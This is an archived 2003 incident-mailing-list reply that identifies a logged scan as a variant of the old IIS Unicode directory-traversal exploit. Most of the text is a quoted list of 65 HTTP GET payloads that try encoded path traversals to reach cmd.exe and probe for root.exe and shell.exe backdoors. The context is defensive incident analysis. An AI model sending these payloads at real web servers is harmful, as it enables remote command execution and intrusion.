('binary' encoding is not supported, stored as-is) In-Reply-To: <20030424234343.8177.qmailat_private> This is a slightly modified version of the old MS IIS-Unicode exploit, see here: http://downloads.securityfocus.com/vulnerabilities/exploits/iis-kabom.php Reinhard Handwerker Internet Security Systems Atlanta, GA >From: Mark Embrich <mark_embrichat_private> >To: incidentsat_private >Subject: New attack or old Vulnerability Scanner? > >Hello, > >Does anyone recognize this pattern of a TCP connect scan, then 65 GETs? >Note that it also included: "User-Agent:.Mozilla/3.0. >(compatible;.Indy.Library)...." >For which my googling tells me that this attack/scanner is probably >built using Borland Delphi/C++ Builder suite. > >I've so far received 3 of these from 2 different IP addresses. >The first two were from a Comcast cable user. >The last was from a Cox Communications IP. > >Thanks, >Mark Embrich > >0. Scan TCP 80 >1. GET./..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >2. GET./..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >3. GET./_vti_bin/.%252e/.%252e/.%252e/.% >252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >4. GET./_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35% >63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >5. GET./_vti_bin/..%%35c..%%35c..%%35c..%%35c..%% >35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >6. GET./_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35% >63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >7. GET./_vti_bin/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >8. GET./_vti_bin/..%255c..%255c..%255c..%255c..% >255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >9. GET./_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >10. GET./_vti_bin/..%c0%af../..%c0%af../..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >11. GET./_vti_cnf/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >12. GET./_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >13. GET./adsamples/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >14. GET./adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >15. GET./cgi-bin/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >16. GET./cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >17. GET./iisadmpwd/..%252f..%252f..%252f..%252f..%252f..% >252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >18. GET./iisadmpwd/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >19. GET./iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >20. GET./iisadmpwd/..%c0%af../..%c0%af../..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >21. GET./msadc/.%252e/.%252e/.%252e/.% >252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >22. GET./MSADC/..%%35%63..%%35%63..%%35%63..%%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >23. GET./msadc/..%%35%63../..%%35%63../..%%35% >63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >24. GET./MSADC/..%%35c..%%35c..%%35c..%% >35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >25. GET./msadc/..%%35c../..%%35c../..%% >35c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >26. GET./msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >27. GET./msadc/..%25%35%63../..%25%35%63../..%25%35% >63../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >28. GET./msadc/..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >29. GET./msadc/..%255c../..%255c../..% >255c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >30. GET./msadc/..%c0%af../..%c0%af../..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >31. GET./msadc/..%c0%af../..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >32. GET./msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/% >af../winnt/system32/cmd.exe/?/c/+dir+c:.HTTP/1.1.. >33. GET./msdac/root.exe?/c+dir+c:.HTTP/1.1.. >34. GET./msdac/shell.exe?/c+dir+c:.HTTP/1.1.. >35. GET./PBServer/..%%35%63..%%35%63..%%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >36. GET./PBServer/..%%35c..%%35c..%% >35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >37. GET./PBServer/..%25%35%63..%25%35%63..%25%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >38. GET./PBServer/..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >39. GET./Rpc/..%%35%63..%%35%63..%%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >40. GET./Rpc/..%%35c..%%35c..%% >35cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >41. GET./Rpc/..%25%35%63..%25%35%63..%25%35% >63winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >42. GET./Rpc/..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >43. GET./samples/..%255c..%255c..%255c..%255c..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >44. GET./samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >45. GET./scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >46. GET./scripts/.%252e/.% >252e/winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >47. GET./scripts/..%252f..%252f..%252f..% >252fwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >48. GET./scripts/..%255c..% >255cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >49. GET./scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >50. GET./scripts/..%C0%AF..%C0%AF..%C0%AF..%C0% >AFwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >51. GET./scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >52. GET./scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >53. GET./scripts/..%C1%1C..%C1%1C..%C1%1C..%C1% >1Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >54. GET./scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >55. GET./scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >56. GET./scripts/..%C1%9C..%C1%9C..%C1%9C..%C1% >9Cwinnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >57. GET./scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >58. GET./scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >59. GET./scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >60. GET./scripts/..%e0%80% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >61. GET./scripts/..%f0%80%80% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >62. GET./scripts/..%f8%80%80%80% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >63. GET./scripts/..%fc%80%80%80%80% >af../winnt/system32/cmd.exe?/c+dir+c:.HTTP/1.1.. >64. GET./scripts/root.exe?/c+dir+c:.HTTP/1.1.. >65. GET./scripts/shell.exe?/c+dir+c:.HTTP/1.1.. > >-------------------------------------------------------------------------- -- >Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the >world's premier event for IT and network security experts. The two-day >Training features 6 hand-on courses on May 12-13 taught by professionals. >The two-day Briefings on May 14-15 features 24 top speakers with no vendor >sales pitches. Deadline for the best rates is April 25. Register today to >ensure your place. http://www.securityfocus.com/BlackHat-incidents >-------------------------------------------------------------------------- -- > > ---------------------------------------------------------------------------- Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-incidents ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Mon Apr 28 2003 - 10:32:44 PDT